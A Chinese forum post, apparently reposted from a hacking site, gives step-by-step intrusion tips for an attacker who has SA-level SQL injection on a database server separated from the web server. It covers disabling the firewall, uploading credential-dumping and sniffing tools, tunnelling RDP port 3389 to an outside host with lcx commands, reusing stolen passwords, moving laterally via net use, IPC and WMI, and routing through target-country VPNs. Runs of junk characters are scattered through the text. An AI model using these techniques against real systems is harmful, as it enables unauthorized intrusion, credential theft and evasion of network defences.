当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
, y* ^# y; W2 B M4 @9 {4 U4 o2 u
* d! O9 u5 w4 e [, f3 w# W8 ^. c/ b! ~* [5 K8 K& O
/ z9 u0 Y+ c( u2 p* d& X5 U
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)! X, z7 ?' x" K j3 ?8 Z8 f
& H2 ^! D; l& b- B; S
# Q, X# y% y2 D; l; l一、DB机有公网IP.$ s1 A& Y: \/ Y9 e5 `
$ M) L6 i/ o/ r Q
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
6 V+ I, g0 o3 g& m8 W5 j" Q5 m8 [; I. ]9 _9 N& X
/ s' J+ a( S, [* j* ^2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.- z5 e- _ {: W5 W# E) M+ A
" |$ C: R0 H8 {+ j& }
- E6 h' R4 h" a6 a: W' f
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
' R+ m2 _4 i2 g* {9 X* G4 q0 A
. y, b- i/ x1 C$ b3 f( Q( C$ I' ?- M% M+ H+ q
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
/ C8 j3 \% i9 T6 o
! ~3 l3 D3 e1 E% _9 O" ^# [
0 r6 p8 j v( i% }, [/ o
& X) b! [3 F. Q j( E二、DB机只有内网IP
9 \+ S& |( O0 G( I$ \2 B2 @5 @' X3 _( d. F
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
! Z5 l4 K1 H4 Z% d
! p& l) N! h g' y
7 l t' @' b& v* C/ \2:停掉防火墙和IP策略再从内往外扫描.& c! R# r, ?/ d N& }$ u+ ?% k+ B* _7 `
7 V5 p/ I$ s1 M: ~+ v6 d1 f. i# B x: y) I1 l' O
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.0 o9 V* U5 t# X2 e* @- ~ Z# |
. l4 \/ B+ _, d0 o3 t' L' e
: W( P6 S1 K$ D' g( i4:学会密码规律分析往往会有惊喜.4 F8 ~7 l5 c; e+ U. L
5 }! H# Y. s4 K" }
9 @0 u: i' P& L' S9 E5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等! i, A( e: |9 j ~# S3 M
9 [! e; z2 N. P$ I' M6 R
- @; R8 p( @, ]! }4 t, C2 m有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |